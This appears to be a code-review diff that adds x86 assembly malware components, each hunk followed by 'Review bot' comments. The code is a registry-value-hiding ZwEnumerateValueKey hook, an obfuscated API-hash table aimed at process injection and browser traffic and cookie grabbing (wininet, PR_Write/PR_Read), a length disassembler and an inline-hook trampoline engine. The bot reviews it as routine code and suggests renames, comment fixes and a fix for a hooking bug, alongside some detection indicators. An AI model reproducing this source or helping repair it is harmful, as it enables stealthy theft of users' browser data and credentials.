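Review bot: `.if p8!=3` compares `FileInformationClass` against a bare `3` while the struc it guards is declared directly above; `FileBothDirectoryInformation equ 3` beside the struc and `.if p8!=FileBothDirectoryInformation` tie the check to the layout. In `FILE_BOTH_DIRECTORY_INFORMATION` the field named `Unknown` is `FileIndex`, and `AlternateNameLength`/`AlternateName` are `ShortNameLength`/`ShortName` in the public `FILE_BOTH_DIR_INFORMATION` definition; using the documented names helps anyone comparing against ntifs.h. The walk from `@NextFname:` keeps `eax` on the current entry and `edx` on the last retained entry, drops a middle entry by adding its `NextEntryOffset` to its predecessor's, and moves the second entry over the first with `rep movsb` (`ecx` from the next entry's length, or `sizeof` + `FileNameLength` when it is last); a four-line comment above the label saying exactly that would let the loop be read without a trace.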


@@ -0,0 +1,2 @@
; ZwQuerySystemInformation


@@ -0,0 +1,78 @@
KEY_VALUE_BASIC_INFORMATION struc
TitleIndex dd ?
_Type dd ?
NameLength dd ?
_Name dw ?
KEY_VALUE_BASIC_INFORMATION ends
KEY_VALUE_FULL_INFORMATION struc
TitleIndex dd ?
_Type dd ?
DataOffset dd ?
DataLength dd ?
NameLength dd ?
_Name dw ?
KEY_VALUE_FULL_INFORMATION ends
.code
;; -------------------------------------------------------------------------------- ;;
NewZwEnumerateValueKey proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword
local RealZwEnumerateKey : dword
local nCount : dword
local lpName : dword
mov RealZwEnumerateKey, eax
mov nCount, 0
mov eax, p4
.if p3==0
lea eax, (KEY_VALUE_BASIC_INFORMATION ptr [eax])._Name
.elseif p3==1
lea eax, (KEY_VALUE_FULL_INFORMATION ptr [eax])._Name
.else
xor eax, eax
push p2
pop nCount
.endif
mov lpName, eax
@RealZwEnumerateKey:
push p6 ; ResultLength
push p5 ; Length
push p4 ; KeyValueInformation
push p3 ; KeyValueInformationClass
push nCount ; Index
push p1 ; KeyHandle
call RealZwEnumerateKey ; Real ZwEnumerateValueKey
.if eax!=STATUS_SUCCESS
ret
.endif
.if lpName==0
ret
.endif
pushad
; Decision: to hide or not to hide
mov ebx, lpName
call IsHiddenRegValue
.if ebx!=0
inc p2
.endif
mov eax, p2
.if nCount==eax
popad
ret
.endif
inc nCount
popad
jmp @RealZwEnumerateKey
NewZwEnumerateValueKey endp
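Review bot: The local `RealZwEnumerateKey` holds the real `ZwEnumerateValueKey` (the comment on the `call` says as much), so the name misleads; `RealZwEnumerateValueKey` matches the proc name and the `Real*` naming used by the sibling hooks. `.if p3==0` / `.elseif p3==1` test `KeyValueInformationClass` against bare numbers; `KeyValueBasicInformation equ 0` and `KeyValueFullInformation equ 1` next to the two strucs would document which layout each `_Name` offset belongs to. The `.else` branch zeroes `lpName` and copies `p2` into `nCount`, which turns the proc into a pass-through for every other class; a comment `; other classes: forward unchanged, no filtering` above it spares the reader deriving that from the later `.if lpName==0` / `ret`.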


@@ -0,0 +1,103 @@
.code
;; Constants
ARRAYLEN equ 1024
KBYTE equ 1024
MBYTE equ 1024*KBYTE
BUFFERLEN equ 2*MBYTE
RESERVE equ 128*KBYTE
HTTP_REQUEST equ 1
HTTPS_REQUEST equ 2
INJECT_GRABBED equ 3
@_API_Hashes_table:
;; API Hashes table start
;; kernel32
_LoadLibraryA dd 0, 05A575AE4h
_GetModuleHandleA dd 0, 0C02BD427h
_CreateToolhelp32Snapshot dd 0, 03B2EFF48h
_Process32First dd 0, 0D2F49D5Ah
_Process32Next dd 0, 0B06C2089h
_OpenProcess dd 0, 0684C0A05h
_CreateFileA dd 0, 0A2A93BE9h
_GetFileSize dd 0, 0CA80AE13h
_SetFilePointer dd 0, 006D09387h
_ReadFile dd 0, 004D8BEBAh
_WriteFile dd 0, 0245BD03Bh
_CreateRemoteThread dd 0, 03E01E6ACh
_CreateThread dd 0, 072A43A6Eh
_ExitProcess dd 0, 0D4D6F7A1h
_VirtualAlloc dd 0, 0C03EE45Ah
_VirtualAllocEx dd 0, 0CC09B795h
_VirtualProtect dd 0, 0CC265304h
_VirtualProtectEx dd 0, 01355E61Fh
_VirtualFree dd 0, 0D252282Fh
_VirtualFreeEx dd 0, 041B9B35Ah
_WriteProcessMemory dd 0, 0894852D9h
_lstrcmpiA dd 0, 02BB2FD91h
_lstrlenA dd 0, 0063E2E81h
_CloseHandle dd 0, 0986B3A78h
_GetCurrentProcessId dd 0, 01547C797h
_WinExec dd 0, 000BB9A05h
_Sleep dd 0, 00003B1AFh
_ExitThread dd 0, 0D543F4F0h
;; ntdll
_RtlAdjustPrivilege dd 0, 0EFD3AA98h
_RtlGetLastWin32Error dd 0, 0FEC76D6Fh
_RtlSetLastWin32Error dd 0, 0BB094F7Bh
;; ws2_32
_WSAStartup dd 0, 0F1AED070h
_inet_addr dd 0, 02A51A274h
_gethostbyname dd 0, 03718CB58h
_socket dd 0, 000222B6Bh
_connect dd 0, 000D2E20Ah
_send dd 0, 00000B0D0h
_recv dd 0, 00000AF3Eh
_closesocket dd 0, 0B33E156Bh
;; wininet
_HttpAddRequestHeadersA dd 0, 003F21E69h
_HttpAddRequestHeadersW dd 0, 003F21E7Fh
_HttpQueryInfoA dd 0, 0C542F043h
_InternetQueryOptionA dd 0, 0312DDA65h
_InternetGetCookieA dd 0, 04C581F48h
_InternetSetStatusCallback dd 0, 0C3F003F0h
_InternetReadFileExA dd 0, 0CA699E5Bh
_HttpSendRequestA dd 0, 0AF43415Ah
_HttpSendRequestW dd 0, 0AF434170h
_InternetReadFile dd 0, 0F268CC2Bh
_InternetQueryDataAvailable dd 0, 09450A760h
_HttpSendRequestExW dd 0, 08BDF869Dh
_InternetWriteFile dd 0, 0A34C2E52h
_HttpEndRequestA dd 0, 087F01B75h
_InternetCloseHandle dd 0, 0E46D3CDFh
;; nspr4 & chrome
_PR_Write dd 0, 0049CBEFAh
_PR_Read dd 0, 000A8A40Bh
_PR_Close dd 0, 0049BFC7Bh
;; API Hashes table end
dd 0, 0
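Review bot: The table layout is undocumented: each entry is two dwords, the first initialised to `0` and the second an API-name hash, and the trailing `dd 0, 0` terminates the list; a comment at `@_API_Hashes_table:` such as `;; entry: dd <slot, 0 here>, <name hash>; list ends with dd 0,0` states it (what the resolver writes into the first dword is not visible in this hunk, so confirm against that code before documenting it as an address). The table lives in `.code`; if those leading dwords are written at runtime the section must be writable, which for defenders is the writable-code characteristic that memory scanners flag, and the fixed sequence of hash constants is itself a usable static signature for this family. The `equ` constants (`ARRAYLEN`, `KBYTE`, `BUFFERLEN`, `RESERVE`, the request types) emit no bytes, so placing them under `.code` is harmless, but they would read better grouped in an include ahead of the section directives.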


@@ -0,0 +1,286 @@
;==================================================================================================================================================
; ******** *** *********** ********* *** *** *** *** ******* *******
; *********** **** **** *********** *********** *** *** *** *** ***** ***** ***** *****
; *** *** *** *** *** *** *** *** *** *** *** ** *** ** ****
; *** *********** *** *** *********** ** ** **** ****
; *** *** *********** *** *** *** *********** *** ** *** ****
; *********** *** *** *** *********** *** *** *** ***** ***** ***********
; ********* *** *** *** ********* *** *** *** ******* ***********
;==================================================Catchy32 v1.6 - Length Disassembler Engine 32bit================================================
;SIZE=580 bytes
;Version:
;1.0-test version
;1.1-added: support prefix
;1.2-added: TableEXT
;1.3-added: support for 0F6h and 0F7h groups
;1.4-tables fixed
; -SIB byte handling fixed
;1.5-code fixed&optimized
; -processing 0F6h and 0F7h groups is corrected
; -processing 0A0h-0A3h groups is corrected
;1.6-code fixed
; -added: max lenght=15 bytes
;==================================================================================================================================================
;in: esi - pointer to opcode
;out: eax - opcode length or 0ffffffffh if error
;(c) sars [HI-TECH] 2003
;sars@ukrtop.com
;==================================================================================================================================================
pref66h equ 1
pref67h equ 2
.code
;---------------Initial adjustment----------------
c_Catchy:
pushad
call c_Delta
;------------Delta-offset calculation-------------
c_Delta:
pop ebp
sub ebp, offset c_Delta
xor ecx, ecx
;----Flags extraction, checks for some opcodes----
c_ExtFlags:
xor eax, eax
xor ebx, ebx
cdq
lodsb ;al <- opcode
mov cl, al ;cl <- opcode
cmp al, 0fh ;Test on prefix 0Fh
je c_ExtdTable
cmp word ptr [esi-1], 20CDh ;Test on VXD call
jne c_NormTable
inc esi ;If VXD call (int 20h), then command length is 6 bytes
lodsd
jmp c_CalcLen
c_ExtdTable: ;Load flags from extended table
lodsb
inc ah ;EAX=al+100h (100h/2 - lenght first table)
c_NormTable: ;Load flags from normal table
shr eax, 1 ;Elements tables on 4 bits
mov al, byte ptr [ebp+c_Table+eax]
c_CheckC1:
jc c_IFC1
shr eax, 4 ;Get high 4-bits block if offset is odd, otherwise...
c_IFC1:
and eax, 0Fh ;...low
xchg eax, ebx ;EAX will be needed for other purposes
;--------------Opcode type checking---------------
c_CheckFlags:
cmp bl, 0Eh ;Test on ErrorFlag
je c_Error
cmp bl, 0Fh ;Test on PrefixFlag
je c_Prefix
or ebx, ebx ;One byte command
jz c_CalcLen
btr ebx, 0 ;Command with ModRM byte
jc c_ModRM
btr ebx, 1 ;Test on imm8,rel8 etc flag
jc c_incr1
btr ebx, 2 ;Test on ptr16 etc flag
jc c_incr2
;-----imm16/32,rel16/32, etc types processing-----
c_16_32:
and bl, 11110111b ;Reset 16/32 sign
cmp cl, 0A0h ;Processing group 0A0h-0A3h
jb c_Check66h
cmp cl, 0A3h
ja c_Check66h
test ch, pref67h
jnz c_incr2
jmp c_incr4
c_Check66h: ;Processing other groups
test ch, pref66h
jz c_incr4
jmp c_incr2
;---------------Prefixes processing---------------
c_Prefix:
cmp cl, 66h
je c_SetFlag66h
cmp cl, 67h
jne c_ExtFlags
c_SetFlag67h:
or ch, pref67h
jmp c_ExtFlags
c_SetFlag66h:
or ch, pref66h
jmp c_ExtFlags
;--------------ModR/M byte processing-------------
c_ModRM:
lodsb
c_Check_0F6h_0F7h: ;Check on 0F6h and 0F7h groups
cmp cl, 0F7h
je c_GroupF6F7
cmp cl, 0F6h
jne c_ModXX
c_GroupF6F7: ;Processing groups 0F6h and 0F7h
test al, 00111000b
jnz c_ModXX
test cl, 00000001b
jz c_incbt1
test ch, 1
jnz c_incbt2
inc esi
inc esi
c_incbt2: inc esi
c_incbt1: inc esi
c_ModXX: ;Processing MOD bits
mov edx, eax
and al, 00000111b ;al <- only R/M bits
test dl, 11000000b ;Check MOD bits
jz c_Mod00
jp c_CheckFlags ;Or c_Mod11
js c_Mod10
c_Mod01:
test ch, pref67h
jnz c_incr1 ;16-bit addressing
cmp al, 4 ;Check SIB
je c_incr2
jmp c_incr1
c_Mod00:
test ch, pref67h
jz c_Mod00_32 ;32-bit addressing
cmp al, 6
je c_incr2
jmp c_CheckFlags
c_Mod00_32:
cmp al, 4 ;Check SIB
jne c_disp32
c_SIB: ;Processing SIB byte
lodsb
and al, 00000111b
cmp al, 5
je c_incr4
jmp c_CheckFlags
c_disp32:
cmp al, 5
je c_incr4
jmp c_CheckFlags
c_Mod10:
test ch, pref67h
jnz c_incr2 ;16-bit addressing
cmp al, 4 ;Check SIB
je c_incr5
jmp c_incr4
c_incr5: inc esi
c_incr4: inc esi
inc esi
c_incr2: inc esi
c_incr1: inc esi
jmp c_CheckFlags
;-----------Command length calculation------------
c_CalcLen:
sub esi, [esp+4*1]
cmp esi, 15
ja c_Error
mov [esp+4*7], esi
jmp c_Exit
;----------------Setting the error----------------
c_Error:
xor eax, eax
dec eax
mov [esp+4*7], eax
;---------Restore the registers and exit----------
c_Exit:
popad
ret
;-------------------------------------------------
;==================================================================================================================================================
;Flag tables for normal and extended Intel opcodes
;(c) sars [HI-TECH] 2003
;sars@ukrtop.com
;
;Version:
;01-test version
;02-added: TableEXT
;03-added: new flags
;04-added: support for MMX, SSE, SSE2, 3DNOW
;
;Description:
;Size of table element is 4 bits.
;0h-one byte instruction
;1h-ModRM byte
;2h-imm8,rel8 etc
;4h-ptr16 etc
;8h-imm16/32,rel16/32 etc
;0Fh-prefix
;0Eh-unsupported opcodes
;3DNOW-Supported
;SSE-Supported
;SSE2-Supported
;MMX-Supported
;================NORMAL OPCODES================
c_Table:
; 01 23 45 67 89 AB CD EF
db 011h,011h,028h,000h,011h,011h,028h,000h;0Fh
db 011h,011h,028h,000h,011h,011h,028h,000h;1Fh
db 011h,011h,028h,0F0h,011h,011h,028h,0F0h;2Fh
db 011h,011h,028h,0F0h,011h,011h,028h,0F0h;3Fh
db 000h,000h,000h,000h,000h,000h,000h,000h;4Fh
db 000h,000h,000h,000h,000h,000h,000h,000h;5Fh
db 000h,011h,0FFh,0FFh,089h,023h,000h,000h;6Fh
db 022h,022h,022h,022h,022h,022h,022h,022h;7Fh
db 039h,033h,011h,011h,011h,011h,011h,011h;8Fh
db 000h,000h,000h,000h,000h,0C0h,000h,000h;9Fh
db 088h,088h,000h,000h,028h,000h,000h,000h;AFh
db 022h,022h,022h,022h,088h,088h,088h,088h;BFh
db 033h,040h,011h,039h,060h,040h,002h,000h;CFh
db 011h,011h,022h,000h,011h,011h,011h,011h;DFh
db 022h,022h,022h,022h,088h,0C2h,000h,000h;EFh
db 0F0h,0FFh,000h,011h,000h,000h,000h,011h;FFh
;==============================================
Lentable equ $-c_Table
comment !
;===============EXTENDED OPCODES===============
c_TableEXT:
; 01 23 45 67 89 AB CD EF
db 011h,011h,0E0h,000h,000h,0EEh,0E1h,003h;0Fh
db 011h,011h,011h,011h,01Eh,0EEh,0EEh,0EEh;1Fh
db 011h,011h,01Eh,01Eh,011h,011h,011h,011h;2Fh
db 000h,000h,000h,0EEh,0EEh,0EEh,0EEh,0EEh;3Fh
db 011h,011h,011h,011h,011h,011h,011h,011h;4Fh
db 011h,011h,011h,011h,011h,011h,011h,011h;5Fh
db 011h,011h,011h,011h,011h,011h,011h,011h;6Fh
db 033h,033h,011h,010h,011h,011h,011h,011h;7Fh
db 088h,088h,088h,088h,088h,088h,088h,088h;8Fh
db 011h,011h,011h,011h,011h,011h,011h,011h;9Fh
db 000h,001h,031h,011h,000h,001h,031h,011h;AFh
db 011h,011h,011h,011h,0EEh,031h,011h,011h;BFh
db 011h,031h,033h,031h,000h,000h,000h,000h;CFh
db 0E1h,011h,011h,011h,011h,011h,011h,011h;DFh
db 011h,011h,011h,011h,011h,011h,011h,011h;EFh
db 0E1h,011h,011h,011h,011h,011h,011h,01Eh;FFh
;==============================================
!
;==================================================================================================================================================
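Review bot: `c_TableEXT` is enclosed in the `comment !` … `!` block and assembles to nothing, yet `c_ExtdTable` still computes `eax = al + 100h`, shifts right, and reads `byte ptr [ebp+c_Table+eax]` — an index of 80h..0FFh into a table that `Lentable` shows is 80h bytes long — so every 0Fh-prefixed opcode takes its flags from whatever the linker placed after `c_Table`. Lengths reported for two-byte opcodes are therefore arbitrary, and the caller that copies an API prologue on the strength of them will misjudge any API whose first five bytes contain such an instruction; until the table is restored the fail-safe is `c_ExtdTable: jmp c_Error`, or at least a comment at the label recording the limitation. The header's `lenght` (twice) should read `length`, and `;EAX=al+100h (100h/2 - lenght first table)` is clearer as `;eax = 100h + al -> index into second (extended) table`.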


@@ -0,0 +1,94 @@
.code
;; ==================================================================================================== ;;
;; HookAPI - procedure sets hook on given API address ;;
;; replace original API start to push addr and retn to handler procedure ;;
;; creates trampoline contained replaced code of original API and return to code after it ;;
;; changes given API pointer to address of trampoline (real API code start) ;;
;; __in lpHandlerProc - pointer to handler procedure ;;
;; __inout plpAPI - pointer to API pointer ;;
;; ==================================================================================================== ;;
HookAPI proc uses ecx edi esi lpHandlerProc, plpAPI : dword
local lpAPI : dword
local flOldProtect : dword
mov eax, plpAPI
mov eax, [eax]
mov lpAPI, eax
;; Change API memory protection
invokx _VirtualProtect[ebx], lpAPI, 32, PAGE_READWRITE, &flOldProtect
test eax, eax
jz @ret
;; Allocate memory for trampoline
invokx _VirtualAlloc[ebx], 0, 32, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE
test eax, eax
jz @oldprotect
mov edi, eax
;; Get size of code to copy
xor ecx, ecx
mov esi, lpAPI
@@: mov eax, ebx
add eax, c_Catchy
call eax
cmp eax, -1
je @error
add esi, eax ;; esi = current code instruction
add ecx, eax ;; eax = current instructions len
cmp ecx, 5
jb @B
;; Copy original api code to new place
mov eax, edi ;; save
sub esi, ecx ;; pointer to current API start
rep movsb
;; Write return to original API code + len of copied code
mov byte ptr [edi], 68h ;; PUSH offset original API + offsed of copied code
mov dword ptr [edi+1], esi ;; addr
mov byte ptr [edi+5], 0C3h ;; RETN
;; New real API address
mov edi, plpAPI
mov [edi], eax
;; Edit original API code start
mov edi, lpAPI
mov eax, lpHandlerProc
mov byte ptr [edi], 0E9h ;; JMP FAR
sub eax, edi ;;
sub eax, 5 ;;
mov dword ptr [edi+1], eax ;; addr
jmp @oldprotect
@error:
;; Release trampoline memory
invokx _VirtualFree[ebx], edi, 0, MEM_RELEASE
@oldprotect:
;; Restore old API memory protection
invokx _VirtualProtect[ebx], lpAPI, 32, flOldProtect, &flOldProtect
@ret:
ret
HookAPI endp
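Review bot: The comment `;; JMP FAR` on `mov byte ptr [edi], 0E9h` is wrong — `E9` is a near relative jump with a `rel32` operand, which is exactly what the `sub eax, edi` / `sub eax, 5` displacement math below it computes; write `;; JMP rel32 to handler`. `add ecx, eax ;; eax = current instructions len` describes the wrong register: `ecx` accumulates the total copied length and the following `cmp ecx, 5` depends on it. The header should also state two properties of the code: the copied prologue is relocated byte-for-byte, so a `rel8`/`rel32` branch inside the first five bytes is not fixed up (a known limitation of this trampoline style), and the API page is toggled through `PAGE_READWRITE` while the trampoline is allocated `PAGE_EXECUTE_READWRITE`. For detection, the five-byte `E9` at an export's entry, the `68 imm32 / C3` push-ret trampoline in a fresh RWX allocation, and the paired `VirtualProtect` calls on a code page are the textbook inline-hook indicators that hook scanners and memory-integrity checks look for.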
